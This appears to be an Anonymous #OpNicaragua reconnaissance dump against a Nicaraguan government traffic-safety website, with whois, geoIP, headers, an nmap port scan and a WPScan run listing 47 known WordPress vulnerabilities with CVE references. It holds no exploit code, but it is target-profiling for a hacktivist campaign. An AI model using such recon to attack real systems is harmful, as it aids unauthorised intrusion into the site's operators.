Anonymous #OpNicaragua JTSEC Full Recon #17

1. ######################################################################################################################################
2. Hostname www.transitonacional.gob.ni ISP Unified Layer
3. Continent North America Flag
4. US
5. Country United States Country Code US
6. Region Utah Local time 08 Aug 2018 08:01 MDT
7. City Provo Postal Code 84606
8. IP Address 50.87.39.91 Latitude 40.218
9. Longitude -111.613
10. #######################################################################################################################################
11. HostIP:50.87.39.91
12. HostName:transitonacional.gob.ni
13.  
14. Gathered Inet-whois information for 50.87.39.91
15. ---------------------------------------------------------------------------------------------------------------------------------------
16.  
17.  
18. Gathered Inic-whois information for transitonacional.gob.ni
19. ---------------------------------------------------------------------------------------------------------------------------------------
20. Error: Unable to connect - Invalid Host
21. ERROR: Connection to InicWhois Server ni.whois-servers.net failed
22. close error
23.  
24. Gathered Netcraft information for transitonacional.gob.ni
25. --------------------------------------------------------------------------------------------------------------------------------------
26.  
27. Retrieving Netcraft.com information for transitonacional.gob.ni
28. Netcraft.com Information gathered
29.  
30. Gathered Subdomain information for transitonacional.gob.ni
31. ---------------------------------------------------------------------------------------------------------------------------------------
32. Searching Google.com:80...
33. Searching Altavista.com:80...
34. Found 0 possible subdomain(s) for host transitonacional.gob.ni, Searched 0 pages containing 0 results
35.  
36. Gathered E-Mail information for transitonacional.gob.ni
37. ---------------------------------------------------------------------------------------------------------------------------------------
38. Searching Google.com:80...
39. Searching Altavista.com:80...
40. Found 0 E-Mail(s) for host transitonacional.gob.ni, Searched 0 pages containing 0 results
41.  
42. Gathered TCP Port information for 50.87.39.91
43. ---------------------------------------------------------------------------------------------------------------------------------------
44.  
45. Port State
46.  
47. 21/tcp open
48. 22/tcp open
49. 26/tcp open
50. 80/tcp open
51. 110/tcp open
52. 143/tcp open
53.  
54. Portscan Finished: Scanned 150 ports, 1 ports were in state closed
55.  
56. #######################################################################################################################################
57. [i] Scanning Site: http://transitonacional.gob.ni
58.  
59.  
60.  
61. B A S I C I N F O
62. =======================================================================================================================================
63.  
64.  
65. [+] Site Title: Dirección de Seguridad de Transito
66. [+] IP address: 50.87.39.91
67. [+] Web Server: nginx/1.14.0
68. [+] CMS: WordPress
69. [+] Cloudflare: Not Detected
70. [+] Robots File: Found
71.  
72. -------------[ contents ]----------------
73. User-agent: *
74. Disallow: /wp-admin/
75. Allow: /wp-admin/admin-ajax.php
76.  
77. -----------[end of contents]-------------
78.  
79.  
80. G E O I P L O O K U P
81. =======================================================================================================================================
82.  
83. [i] IP Address: 50.87.39.91
84. [i] Country: US
85. [i] State: Utah
86. [i] City: Provo
87. [i] Latitude: 40.218102
88. [i] Longitude: -111.613297
89.  
90.  
91.  
92.  
93. H T T P H E A D E R S
94. =======================================================================================================================================
95.  
96.  
97. [i] HTTP/1.1 301 Moved Permanently
98. [i] Server: nginx/1.14.0
99. [i] Date: Wed, 08 Aug 2018 14:07:10 GMT
100. [i] Content-Type: text/html; charset=UTF-8
101. [i] Content-Length: 0
102. [i] Connection: close
103. [i] X-Powered-By: PHP/5.2.17
104. [i] Vary: Cookie,Accept-Encoding
105. [i] Location: http://www.transitonacional.gob.ni/
106. [i] X-Acc-Exp: 600
107. [i] X-Proxy-Cache: HIT transitonacional.gob.ni
108. [i] HTTP/1.1 200 OK
109. [i] Server: nginx/1.14.0
110. [i] Date: Wed, 08 Aug 2018 14:07:12 GMT
111. [i] Content-Type: text/html; charset=UTF-8
112. [i] Connection: close
113. [i] X-Powered-By: PHP/5.2.17
114. [i] Vary: Accept-Encoding,Cookie
115. [i] Cache-Control: max-age=3, must-revalidate
116. [i] WP-Super-Cache: Served supercache file from PHP
117. [i] X-Acc-Exp: 3
118. [i] X-Proxy-Cache: EXPIRED www.transitonacional.gob.ni
119.  
120.  
121.  
122.  
123. D N S L O O K U P
124. =======================================================================================================================================
125.  
126. ;; Truncated, retrying in TCP mode.
127. transitonacional.gob.ni. 3789 IN HINFO "ANY/RRSIG query Disabled" "See draft-ietf-dnsop-refuse-any"
128.  
129.  
130.  
131.  
132. S U B N E T C A L C U L A T I O N
133. =======================================================================================================================================
134.  
135. Address = 50.87.39.91
136. Network = 50.87.39.91 / 32
137. Netmask = 255.255.255.255
138. Broadcast = not needed on Point-to-Point links
139. Wildcard Mask = 0.0.0.0
140. Hosts Bits = 0
141. Max. Hosts = 1 (2^0 - 0)
142. Host Range = { 50.87.39.91 - 50.87.39.91 }
143.  
144.  
145.  
146. N M A P P O R T S C A N
147. =======================================================================================================================================
148.  
149.  
150. Starting Nmap 7.40 ( https://nmap.org ) at 2018-08-08 14:07 UTC
151. Nmap scan report for transitonacional.gob.ni (50.87.39.91)
152. Host is up (0.10s latency).
153. rDNS record for 50.87.39.91: 50-87-39-91.unifiedlayer.com
154. PORT STATE SERVICE
155. 21/tcp open ftp
156. 22/tcp open ssh
157. 23/tcp filtered telnet
158. 80/tcp open http
159. 110/tcp open pop3
160. 143/tcp open imap
161. 443/tcp open https
162. 3389/tcp filtered ms-wbt-server
163.  
164. Nmap done: 1 IP address (1 host up) scanned in 1.83 seconds
165.  
166. #######################################################################################################################################
167. [?] Enter the target: http://www.transitonacional.gob.ni/
168. [!] IP Address : 50.87.39.91
169. [!] Server: nginx/1.14.0
170. [!] Powered By: PHP/5.2.17
171. [+] Clickjacking protection is not in place.
172. [!] CMS Detected : WordPress
173. [?] Would you like to use WPScan? [Y/n] Y
174.  
175. [+] URL: http://www.transitonacional.gob.ni/
176. [+] Started: Wed Aug 8 10:35:36 2018
177.  
178. [+] Interesting header: SERVER: nginx/1.14.0
179. [+] Interesting header: WP-SUPER-CACHE: Served supercache file from PHP
180. [+] Interesting header: X-POWERED-BY: PHP/5.2.17
181. [+] robots.txt available under: http://www.transitonacional.gob.ni/robots.txt [HTTP 200]
182. [+] This site seems to be a multisite (http://codex.wordpress.org/Glossary#Multisite)
183. [+] This site has 'Must Use Plugins' (http://codex.wordpress.org/Must_Use_Plugins)
184. [+] Found an RSS Feed: http://www.transitonacional.gob.ni/feed [HTTP 200]
185. [!] Missing Author field. Maybe non-standard WordPress RSS feed?
186.  
187. [+] Enumerating WordPress version ...
188.  
189. [+] WordPress version 4.4.2 (Released on 2016-02-02) identified from stylesheets numbers
190. [!] 47 vulnerabilities identified from the version number
191.  
192. [!] Title: WordPress <= 4.4.2 - SSRF Bypass using Octal & Hexedecimal IP addresses
193. Reference: https://wpvulndb.com/vulnerabilities/8473
194. Reference: https://codex.wordpress.org/Version_4.5
195. Reference: https://github.com/WordPress/WordPress/commit/af9f0520875eda686fd13a427fd3914d7aded049
196. Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-4029
197. [i] Fixed in: 4.5
198.  
199. [!] Title: WordPress <= 4.4.2 - Reflected XSS in Network Settings
200. Reference: https://wpvulndb.com/vulnerabilities/8474
201. Reference: https://codex.wordpress.org/Version_4.5
202. Reference: https://github.com/WordPress/WordPress/commit/cb2b3ed3c7d68f6505bfb5c90257e6aaa3e5fcb9
203. Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-6634
204. [i] Fixed in: 4.5
205.  
206. [!] Title: WordPress <= 4.4.2 - Script Compression Option CSRF
207. Reference: https://wpvulndb.com/vulnerabilities/8475
208. Reference: https://codex.wordpress.org/Version_4.5
209. Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-6635
210. [i] Fixed in: 4.5
211.  
212. [!] Title: WordPress 4.2-4.5.1 - MediaElement.js Reflected Cross-Site Scripting (XSS)
213. Reference: https://wpvulndb.com/vulnerabilities/8488
214. Reference: https://wordpress.org/news/2016/05/wordpress-4-5-2/
215. Reference: https://github.com/WordPress/WordPress/commit/a493dc0ab5819c8b831173185f1334b7c3e02e36
216. Reference: https://gist.github.com/cure53/df34ea68c26441f3ae98f821ba1feb9c
217. Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-4567
218. [i] Fixed in: 4.5.2
219.  
220. [!] Title: WordPress <= 4.5.1 - Pupload Same Origin Method Execution (SOME)
221. Reference: https://wpvulndb.com/vulnerabilities/8489
222. Reference: https://wordpress.org/news/2016/05/wordpress-4-5-2/
223. Reference: https://github.com/WordPress/WordPress/commit/c33e975f46a18f5ad611cf7e7c24398948cecef8
224. Reference: https://gist.github.com/cure53/09a81530a44f6b8173f545accc9ed07e
225. Reference: http://avlidienbrunn.com/wp_some_loader.php
226. Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-4566
227. [i] Fixed in: 4.4.3
228.  
229. [!] Title: WordPress 4.2-4.5.2 - Authenticated Attachment Name Stored XSS
230. Reference: https://wpvulndb.com/vulnerabilities/8518
231. Reference: https://wordpress.org/news/2016/06/wordpress-4-5-3/
232. Reference: https://github.com/WordPress/WordPress/commit/4372cdf45d0f49c74bbd4d60db7281de83e32648
233. Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5833
234. Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5834
235. [i] Fixed in: 4.4.4
236.  
237. [!] Title: WordPress 3.6-4.5.2 - Authenticated Revision History Information Disclosure
238. Reference: https://wpvulndb.com/vulnerabilities/8519
239. Reference: https://wordpress.org/news/2016/06/wordpress-4-5-3/
240. Reference: https://github.com/WordPress/WordPress/commit/a2904cc3092c391ac7027bc87f7806953d1a25a1
241. Reference: https://www.wordfence.com/blog/2016/06/wordpress-core-vulnerability-bypass-password-protected-posts/
242. Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5835
243. [i] Fixed in: 4.4.4
244.  
245. [!] Title: WordPress 2.6.0-4.5.2 - Unauthorized Category Removal from Post
246. Reference: https://wpvulndb.com/vulnerabilities/8520
247. Reference: https://wordpress.org/news/2016/06/wordpress-4-5-3/
248. Reference: https://github.com/WordPress/WordPress/commit/6d05c7521baa980c4efec411feca5e7fab6f307c
249. Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5837
250. [i] Fixed in: 4.4.4
251.  
252. [!] Title: WordPress 2.5-4.6 - Authenticated Stored Cross-Site Scripting via Image Filename
253. Reference: https://wpvulndb.com/vulnerabilities/8615
254. Reference: https://wordpress.org/news/2016/09/wordpress-4-6-1-security-and-maintenance-release/
255. Reference: https://github.com/WordPress/WordPress/commit/c9e60dab176635d4bfaaf431c0ea891e4726d6e0
256. Reference: https://sumofpwn.nl/advisory/2016/persistent_cross_site_scripting_vulnerability_in_wordpress_due_to_unsafe_processing_of_file_names.html
257. Reference: http://seclists.org/fulldisclosure/2016/Sep/6
258. Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-7168
259. [i] Fixed in: 4.4.5
260.  
261. [!] Title: WordPress 2.8-4.6 - Path Traversal in Upgrade Package Uploader
262. Reference: https://wpvulndb.com/vulnerabilities/8616
263. Reference: https://wordpress.org/news/2016/09/wordpress-4-6-1-security-and-maintenance-release/
264. Reference: https://github.com/WordPress/WordPress/commit/54720a14d85bc1197ded7cb09bd3ea790caa0b6e
265. Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-7169
266. [i] Fixed in: 4.4.5
267.  
268. [!] Title: WordPress 4.3-4.7 - Remote Code Execution (RCE) in PHPMailer
269. Reference: https://wpvulndb.com/vulnerabilities/8714
270. Reference: https://www.wordfence.com/blog/2016/12/phpmailer-vulnerability/
271. Reference: https://github.com/PHPMailer/PHPMailer/wiki/About-the-CVE-2016-10033-and-CVE-2016-10045-vulnerabilities
272. Reference: https://wordpress.org/news/2017/01/wordpress-4-7-1-security-and-maintenance-release/
273. Reference: https://github.com/WordPress/WordPress/commit/24767c76d359231642b0ab48437b64e8c6c7f491
274. Reference: http://legalhackers.com/advisories/PHPMailer-Exploit-Remote-Code-Exec-CVE-2016-10033-Vuln.html
275. Reference: https://www.rapid7.com/db/modules/exploit/unix/webapp/wp_phpmailer_host_header
276. [i] Fixed in: 4.4.6
277.  
278. [!] Title: WordPress 2.9-4.7 - Authenticated Cross-Site scripting (XSS) in update-core.php
279. Reference: https://wpvulndb.com/vulnerabilities/8716
280. Reference: https://github.com/WordPress/WordPress/blob/c9ea1de1441bb3bda133bf72d513ca9de66566c2/wp-admin/update-core.php
281. Reference: https://wordpress.org/news/2017/01/wordpress-4-7-1-security-and-maintenance-release/
282. Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5488
283. [i] Fixed in: 4.4.6
284.  
285. [!] Title: WordPress 3.4-4.7 - Stored Cross-Site Scripting (XSS) via Theme Name fallback
286. Reference: https://wpvulndb.com/vulnerabilities/8718
287. Reference: https://www.mehmetince.net/low-severity-wordpress/
288. Reference: https://wordpress.org/news/2017/01/wordpress-4-7-1-security-and-maintenance-release/
289. Reference: https://github.com/WordPress/WordPress/commit/ce7fb2934dd111e6353784852de8aea2a938b359
290. Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5490
291. [i] Fixed in: 4.4.6
292.  
293. [!] Title: WordPress <= 4.7 - Post via Email Checks mail.example.com by Default
294. Reference: https://wpvulndb.com/vulnerabilities/8719
295. Reference: https://github.com/WordPress/WordPress/commit/061e8788814ac87706d8b95688df276fe3c8596a
296. Reference: https://wordpress.org/news/2017/01/wordpress-4-7-1-security-and-maintenance-release/
297. Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5491
298. [i] Fixed in: 4.4.6
299.  
300. [!] Title: WordPress 2.8-4.7 - Accessibility Mode Cross-Site Request Forgery (CSRF)
301. Reference: https://wpvulndb.com/vulnerabilities/8720
302. Reference: https://github.com/WordPress/WordPress/commit/03e5c0314aeffe6b27f4b98fef842bf0fb00c733
303. Reference: https://wordpress.org/news/2017/01/wordpress-4-7-1-security-and-maintenance-release/
304. Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5492
305. [i] Fixed in: 4.4.6
306.  
307. [!] Title: WordPress 3.0-4.7 - Cryptographically Weak Pseudo-Random Number Generator (PRNG)
308. Reference: https://wpvulndb.com/vulnerabilities/8721
309. Reference: https://github.com/WordPress/WordPress/commit/cea9e2dc62abf777e06b12ec4ad9d1aaa49b29f4
310. Reference: https://wordpress.org/news/2017/01/wordpress-4-7-1-security-and-maintenance-release/
311. Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5493
312. [i] Fixed in: 4.4.6
313.  
314. [!] Title: WordPress 4.2.0-4.7.1 - Press This UI Available to Unauthorised Users
315. Reference: https://wpvulndb.com/vulnerabilities/8729
316. Reference: https://wordpress.org/news/2017/01/wordpress-4-7-2-security-release/
317. Reference: https://github.com/WordPress/WordPress/commit/21264a31e0849e6ff793a06a17de877dd88ea454
318. Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5610
319. [i] Fixed in: 4.4.7
320.  
321. [!] Title: WordPress 3.5-4.7.1 - WP_Query SQL Injection
322. Reference: https://wpvulndb.com/vulnerabilities/8730
323. Reference: https://wordpress.org/news/2017/01/wordpress-4-7-2-security-release/
324. Reference: https://github.com/WordPress/WordPress/commit/85384297a60900004e27e417eac56d24267054cb
325. Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5611
326. [i] Fixed in: 4.4.7
327.  
328. [!] Title: WordPress 4.3.0-4.7.1 - Cross-Site Scripting (XSS) in posts list table
329. Reference: https://wpvulndb.com/vulnerabilities/8731
330. Reference: https://wordpress.org/news/2017/01/wordpress-4-7-2-security-release/
331. Reference: https://github.com/WordPress/WordPress/commit/4482f9207027de8f36630737ae085110896ea849
332. Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5612
333. [i] Fixed in: 4.4.7
334.  
335. [!] Title: WordPress 3.6.0-4.7.2 - Authenticated Cross-Site Scripting (XSS) via Media File Metadata
336. Reference: https://wpvulndb.com/vulnerabilities/8765
337. Reference: https://wordpress.org/news/2017/03/wordpress-4-7-3-security-and-maintenance-release/
338. Reference: https://github.com/WordPress/WordPress/commit/28f838ca3ee205b6f39cd2bf23eb4e5f52796bd7
339. Reference: https://sumofpwn.nl/advisory/2016/wordpress_audio_playlist_functionality_is_affected_by_cross_site_scripting.html
340. Reference: http://seclists.org/oss-sec/2017/q1/563
341. Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-6814
342. [i] Fixed in: 4.4.8
343.  
344. [!] Title: WordPress 2.8.1-4.7.2 - Control Characters in Redirect URL Validation
345. Reference: https://wpvulndb.com/vulnerabilities/8766
346. Reference: https://wordpress.org/news/2017/03/wordpress-4-7-3-security-and-maintenance-release/
347. Reference: https://github.com/WordPress/WordPress/commit/288cd469396cfe7055972b457eb589cea51ce40e
348. Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-6815
349. [i] Fixed in: 4.4.8
350.  
351. [!] Title: WordPress 4.0-4.7.2 - Authenticated Stored Cross-Site Scripting (XSS) in YouTube URL Embeds
352. Reference: https://wpvulndb.com/vulnerabilities/8768
353. Reference: https://wordpress.org/news/2017/03/wordpress-4-7-3-security-and-maintenance-release/
354. Reference: https://github.com/WordPress/WordPress/commit/419c8d97ce8df7d5004ee0b566bc5e095f0a6ca8
355. Reference: https://blog.sucuri.net/2017/03/stored-xss-in-wordpress-core.html
356. Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-6817
357. [i] Fixed in: 4.4.8
358.  
359. [!] Title: WordPress 4.2-4.7.2 - Press This CSRF DoS
360. Reference: https://wpvulndb.com/vulnerabilities/8770
361. Reference: https://wordpress.org/news/2017/03/wordpress-4-7-3-security-and-maintenance-release/
362. Reference: https://github.com/WordPress/WordPress/commit/263831a72d08556bc2f3a328673d95301a152829
363. Reference: https://sumofpwn.nl/advisory/2016/cross_site_request_forgery_in_wordpress_press_this_function_allows_dos.html
364. Reference: http://seclists.org/oss-sec/2017/q1/562
365. Reference: https://hackerone.com/reports/153093
366. Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-6819
367. [i] Fixed in: 4.4.8
368.  
369. [!] Title: WordPress 2.3-4.8.3 - Host Header Injection in Password Reset
370. Reference: https://wpvulndb.com/vulnerabilities/8807
371. Reference: https://exploitbox.io/vuln/WordPress-Exploit-4-7-Unauth-Password-Reset-0day-CVE-2017-8295.html
372. Reference: http://blog.dewhurstsecurity.com/2017/05/04/exploitbox-wordpress-security-advisories.html
373. Reference: https://core.trac.wordpress.org/ticket/25239
374. Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8295
375.  
376. [!] Title: WordPress 2.7.0-4.7.4 - Insufficient Redirect Validation
377. Reference: https://wpvulndb.com/vulnerabilities/8815
378. Reference: https://github.com/WordPress/WordPress/commit/76d77e927bb4d0f87c7262a50e28d84e01fd2b11
379. Reference: https://wordpress.org/news/2017/05/wordpress-4-7-5/
380. Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-9066
381. [i] Fixed in: 4.4.10
382.  
383. [!] Title: WordPress 2.5.0-4.7.4 - Post Meta Data Values Improper Handling in XML-RPC
384. Reference: https://wpvulndb.com/vulnerabilities/8816
385. Reference: https://wordpress.org/news/2017/05/wordpress-4-7-5/
386. Reference: https://github.com/WordPress/WordPress/commit/3d95e3ae816f4d7c638f40d3e936a4be19724381
387. Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-9062
388. [i] Fixed in: 4.4.10
389.  
390. [!] Title: WordPress 3.4.0-4.7.4 - XML-RPC Post Meta Data Lack of Capability Checks
391. Reference: https://wpvulndb.com/vulnerabilities/8817
392. Reference: https://wordpress.org/news/2017/05/wordpress-4-7-5/
393. Reference: https://github.com/WordPress/WordPress/commit/e88a48a066ab2200ce3091b131d43e2fab2460a4
394. Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-9065
395. [i] Fixed in: 4.4.10
396.  
397. [!] Title: WordPress 2.5.0-4.7.4 - Filesystem Credentials Dialog CSRF
398. Reference: https://wpvulndb.com/vulnerabilities/8818
399. Reference: https://wordpress.org/news/2017/05/wordpress-4-7-5/
400. Reference: https://github.com/WordPress/WordPress/commit/38347d7c580be4cdd8476e4bbc653d5c79ed9b67
401. Reference: https://sumofpwn.nl/advisory/2016/cross_site_request_forgery_in_wordpress_connection_information.html
402. Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-9064
403. [i] Fixed in: 4.4.10
404.  
405. [!] Title: WordPress 3.3-4.7.4 - Large File Upload Error XSS
406. Reference: https://wpvulndb.com/vulnerabilities/8819
407. Reference: https://wordpress.org/news/2017/05/wordpress-4-7-5/
408. Reference: https://github.com/WordPress/WordPress/commit/8c7ea71edbbffca5d9766b7bea7c7f3722ffafa6
409. Reference: https://hackerone.com/reports/203515
410. Reference: https://hackerone.com/reports/203515
411. Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-9061
412. [i] Fixed in: 4.4.10
413.  
414. [!] Title: WordPress 3.4.0-4.7.4 - Customizer XSS & CSRF
415. Reference: https://wpvulndb.com/vulnerabilities/8820
416. Reference: https://wordpress.org/news/2017/05/wordpress-4-7-5/
417. Reference: https://github.com/WordPress/WordPress/commit/3d10fef22d788f29aed745b0f5ff6f6baea69af3
418. Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-9063
419. [i] Fixed in: 4.4.10
420.  
421. [!] Title: WordPress 2.3.0-4.8.1 - $wpdb->prepare() potential SQL Injection
422. Reference: https://wpvulndb.com/vulnerabilities/8905
423. Reference: https://wordpress.org/news/2017/09/wordpress-4-8-2-security-and-maintenance-release/
424. Reference: https://github.com/WordPress/WordPress/commit/70b21279098fc973eae803693c0705a548128e48
425. Reference: https://github.com/WordPress/WordPress/commit/fc930d3daed1c3acef010d04acc2c5de93cd18ec
426. [i] Fixed in: 4.4.11
427.  
428. [!] Title: WordPress 2.3.0-4.7.4 - Authenticated SQL injection
429. Reference: https://wpvulndb.com/vulnerabilities/8906
430. Reference: https://medium.com/websec/wordpress-sqli-bbb2afcc8e94
431. Reference: https://wordpress.org/news/2017/09/wordpress-4-8-2-security-and-maintenance-release/
432. Reference: https://github.com/WordPress/WordPress/commit/70b21279098fc973eae803693c0705a548128e48
433. Reference: https://wpvulndb.com/vulnerabilities/8905
434. [i] Fixed in: 4.7.5
435.  
436. [!] Title: WordPress 2.9.2-4.8.1 - Open Redirect
437. Reference: https://wpvulndb.com/vulnerabilities/8910
438. Reference: https://wordpress.org/news/2017/09/wordpress-4-8-2-security-and-maintenance-release/
439. Reference: https://core.trac.wordpress.org/changeset/41398
440. Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-14725
441. [i] Fixed in: 4.4.11
442.  
443. [!] Title: WordPress 3.0-4.8.1 - Path Traversal in Unzipping
444. Reference: https://wpvulndb.com/vulnerabilities/8911
445. Reference: https://wordpress.org/news/2017/09/wordpress-4-8-2-security-and-maintenance-release/
446. Reference: https://core.trac.wordpress.org/changeset/41457
447. Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-14719
448. [i] Fixed in: 4.4.11
449.  
450. [!] Title: WordPress 4.4-4.8.1 - Cross-Site Scripting (XSS) in oEmbed
451. Reference: https://wpvulndb.com/vulnerabilities/8913
452. Reference: https://wordpress.org/news/2017/09/wordpress-4-8-2-security-and-maintenance-release/
453. Reference: https://core.trac.wordpress.org/changeset/41448
454. Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-14724
455. [i] Fixed in: 4.4.11
456.  
457. [!] Title: WordPress 4.2.3-4.8.1 - Authenticated Cross-Site Scripting (XSS) in Visual Editor
458. Reference: https://wpvulndb.com/vulnerabilities/8914
459. Reference: https://wordpress.org/news/2017/09/wordpress-4-8-2-security-and-maintenance-release/
460. Reference: https://core.trac.wordpress.org/changeset/41395
461. Reference: https://blog.sucuri.net/2017/09/stored-cross-site-scripting-vulnerability-in-wordpress-4-8-1.html
462. Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-14726
463. [i] Fixed in: 4.4.11
464.  
465. [!] Title: WordPress <= 4.8.2 - $wpdb->prepare() Weakness
466. Reference: https://wpvulndb.com/vulnerabilities/8941
467. Reference: https://wordpress.org/news/2017/10/wordpress-4-8-3-security-release/
468. Reference: https://github.com/WordPress/WordPress/commit/a2693fd8602e3263b5925b9d799ddd577202167d
469. Reference: https://twitter.com/ircmaxell/status/923662170092638208
470. Reference: https://blog.ircmaxell.com/2017/10/disclosure-wordpress-wpdb-sql-injection-technical.html
471. Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-16510
472. [i] Fixed in: 4.4.12
473.  
474. [!] Title: WordPress 2.8.6-4.9 - Authenticated JavaScript File Upload
475. Reference: https://wpvulndb.com/vulnerabilities/8966
476. Reference: https://wordpress.org/news/2017/11/wordpress-4-9-1-security-and-maintenance-release/
477. Reference: https://github.com/WordPress/WordPress/commit/67d03a98c2cae5f41843c897f206adde299b0509
478. Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-17092
479. [i] Fixed in: 4.4.13
480.  
481. [!] Title: WordPress 1.5.0-4.9 - RSS and Atom Feed Escaping
482. Reference: https://wpvulndb.com/vulnerabilities/8967
483. Reference: https://wordpress.org/news/2017/11/wordpress-4-9-1-security-and-maintenance-release/
484. Reference: https://github.com/WordPress/WordPress/commit/f1de7e42df29395c3314bf85bff3d1f4f90541de
485. Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-17094
486. [i] Fixed in: 4.4.13
487.  
488. [!] Title: WordPress 4.3.0-4.9 - HTML Language Attribute Escaping
489. Reference: https://wpvulndb.com/vulnerabilities/8968
490. Reference: https://wordpress.org/news/2017/11/wordpress-4-9-1-security-and-maintenance-release/
491. Reference: https://github.com/WordPress/WordPress/commit/3713ac5ebc90fb2011e98dfd691420f43da6c09a
492. Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-17093
493. [i] Fixed in: 4.4.13
494.  
495. [!] Title: WordPress 3.7-4.9 - 'newbloguser' Key Weak Hashing
496. Reference: https://wpvulndb.com/vulnerabilities/8969
497. Reference: https://wordpress.org/news/2017/11/wordpress-4-9-1-security-and-maintenance-release/
498. Reference: https://github.com/WordPress/WordPress/commit/eaf1cfdc1fe0bdffabd8d879c591b864d833326c
499. Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-17091
500. [i] Fixed in: 4.4.13
501.  
502. [!] Title: WordPress 3.7-4.9.1 - MediaElement Cross-Site Scripting (XSS)
503. Reference: https://wpvulndb.com/vulnerabilities/9006
504. Reference: https://github.com/WordPress/WordPress/commit/3fe9cb61ee71fcfadb5e002399296fcc1198d850
505. Reference: https://wordpress.org/news/2018/01/wordpress-4-9-2-security-and-maintenance-release/
506. Reference: https://core.trac.wordpress.org/ticket/42720
507. Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-5776
508. [i] Fixed in: 4.4.14
509.  
510. [!] Title: WordPress <= 4.9.4 - Application Denial of Service (DoS) (unpatched)
511. Reference: https://wpvulndb.com/vulnerabilities/9021
512. Reference: https://baraktawily.blogspot.fr/2018/02/how-to-dos-29-of-world-wide-websites.html
513. Reference: https://github.com/quitten/doser.py
514. Reference: https://thehackernews.com/2018/02/wordpress-dos-exploit.html
515. Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-6389
516.  
517. [!] Title: WordPress 3.7-4.9.4 - Remove localhost Default
518. Reference: https://wpvulndb.com/vulnerabilities/9053
519. Reference: https://wordpress.org/news/2018/04/wordpress-4-9-5-security-and-maintenance-release/
520. Reference: https://github.com/WordPress/WordPress/commit/804363859602d4050d9a38a21f5a65d9aec18216
521. Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-10101
522. [i] Fixed in: 4.4.15
523.  
524. [!] Title: WordPress 3.7-4.9.4 - Use Safe Redirect for Login
525. Reference: https://wpvulndb.com/vulnerabilities/9054
526. Reference: https://wordpress.org/news/2018/04/wordpress-4-9-5-security-and-maintenance-release/
527. Reference: https://github.com/WordPress/WordPress/commit/14bc2c0a6fde0da04b47130707e01df850eedc7e
528. Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-10100
529. [i] Fixed in: 4.4.15
530.  
531. [!] Title: WordPress 3.7-4.9.4 - Escape Version in Generator Tag
532. Reference: https://wpvulndb.com/vulnerabilities/9055
533. Reference: https://wordpress.org/news/2018/04/wordpress-4-9-5-security-and-maintenance-release/
534. Reference: https://github.com/WordPress/WordPress/commit/31a4369366d6b8ce30045d4c838de2412c77850d
535. Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-10102
536. [i] Fixed in: 4.4.15
537.  
538. [!] Title: WordPress <= 4.9.6 - Authenticated Arbitrary File Deletion
539. Reference: https://wpvulndb.com/vulnerabilities/9100
540. Reference: https://blog.ripstech.com/2018/wordpress-file-delete-to-code-execution/
541. Reference: http://blog.vulnspy.com/2018/06/27/Wordpress-4-9-6-Arbitrary-File-Delection-Vulnerbility-Exploit/
542. Reference: https://github.com/WordPress/WordPress/commit/c9dce0606b0d7e6f494d4abe7b193ac046a322cd
543. Reference: https://wordpress.org/news/2018/07/wordpress-4-9-7-security-and-maintenance-release/
544. Reference: https://www.wordfence.com/blog/2018/07/details-of-an-additional-file-deletion-vulnerability-patched-in-wordpress-4-9-7/
545. Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-12895
546. [i] Fixed in: 4.4.16
547.  
548. [+] WordPress theme in use: newsmag
549.  
550. [+] Name: newsmag
551. | Latest version: 2.3.8
